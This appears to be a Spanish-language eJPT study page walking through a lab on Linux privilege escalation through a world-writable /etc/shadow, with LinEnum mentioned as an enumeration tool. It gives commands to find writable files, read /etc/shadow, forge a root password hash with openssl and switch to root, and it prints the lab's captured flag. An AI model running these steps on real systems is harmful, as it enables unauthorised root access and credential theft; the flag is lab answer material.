> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/post-explotacion/escalada/escalada-de-privilegios-en-linux/escalada-de-privilegios-en-linux-permisos-debiles.md).

# Escalada de privilegios en Linux: permisos débiles

**LinEnum** es un script Bash ligero que automatiza los chequeos locales más habituales en Linux y resalta posibles vulnerabilidades de **escalada de privilegios**.

***

### ⚡ Lo que hace por ti

* Recoge información de **SUID/SGID**, capacidades, servicios, cron jobs, reglas `sudo`, contraseñas en texto plano, etc.
* Señala vectores marcados como **`[+] POSSIBLE PRIV ESC`** para priorizar tu explotación.
* No requiere dependencias externas: súbelo, ejecútalo y listo.

***

### 🔗 Repositorio oficial

{% embed url="<https://github.com/rebootuser/LinEnum>" %}

***

## 🧪 Laboratorio Práctico

**Paso 1:** Acceda a la máquina Kali

<figure><img src="/files/CJGjrqUtR2SxwlEaXLBd" alt=""><figcaption></figcaption></figure>

**Paso 2:** Verificar la alcanzabilidad del objetivo

**Dominio:**

```
ping -c4 target.ine.local
```

<figure><img src="/files/NCr4kESlHovN9sVtCVXQ" alt=""><figcaption></figcaption></figure>

El objetivo es alcanzable.

**Paso 3:** Acceder al servicio expuesto

Abra un navegador y navegue a la siguiente URL para explorar el servicio que se ejecuta en el puerto 8000:

\[<http://target.ine.local:8000>]

<figure><img src="/files/fqF4on4byXliBrsCQGtT" alt=""><figcaption></figcaption></figure>

Ahora debería ver la interfaz de terminal Linux ejecutándose, lo que confirma que el servicio está activo y accesible.

**Paso 4:** El siguiente comando buscará archivos (y no enlaces simbólicos, etc.) que se puedan escribir.

**Dominio:**

```
find / -not -type l -perm -o+w
```

<figure><img src="/files/SpdcUMaxCDNwPVeCqpvz" alt=""><figcaption></figcaption></figure>

**Paso 5:** Observe en el resultado que **/etc/shadow** tiene permisos de escritura globales. Verifique esto y también verifique su contenido.

**Comandos:**

```
ls -l /etc/shadow
cat /etc/shadow
```

<figure><img src="/files/OweFhNchcnyGUee6jpgI" alt=""><figcaption></figcaption></figure>

**Paso 6:** Observe que la contraseña de root no esté configurada. Agregar una contraseña conocida en el archivo shadow puede escalar el acceso a root. Use openssl para generar una entrada de contraseña.

**Dominio:**

```
openssl passwd -1 -salt abc password
```

<figure><img src="/files/WecB5HivuJ4s1qTN3z2Z" alt=""><figcaption></figcaption></figure>

**Paso 7:** Copie la entrada generada y agréguela al registro raíz en /etc/shadow

**Dominio:**

```
vim /etc/shadow
```

<figure><img src="/files/xQYAx8AvPMQgOpUGgd10" alt=""><figcaption></figcaption></figure>

**Paso 8:** Después de realizar los cambios, intente cambiar al usuario root.

**Dominio:**

```
su
```

Introducir contraseña: **contraseña**

<figure><img src="/files/Yz2jkMODVy2d6v5ErRJv" alt=""><figcaption></figcaption></figure>

**Paso 9:** Una vez completada la escalada a la raíz, recupere la bandera ubicada en el directorio /root.

**Comandos:**

```
cd /root
ls -l
cat flag
```

<figure><img src="/files/JFbhnvHAjqvaWDQrY2S0" alt=""><figcaption></figcaption></figure>

#### Bandera: e62ab67ddff744d60cbb6232feaefc4d
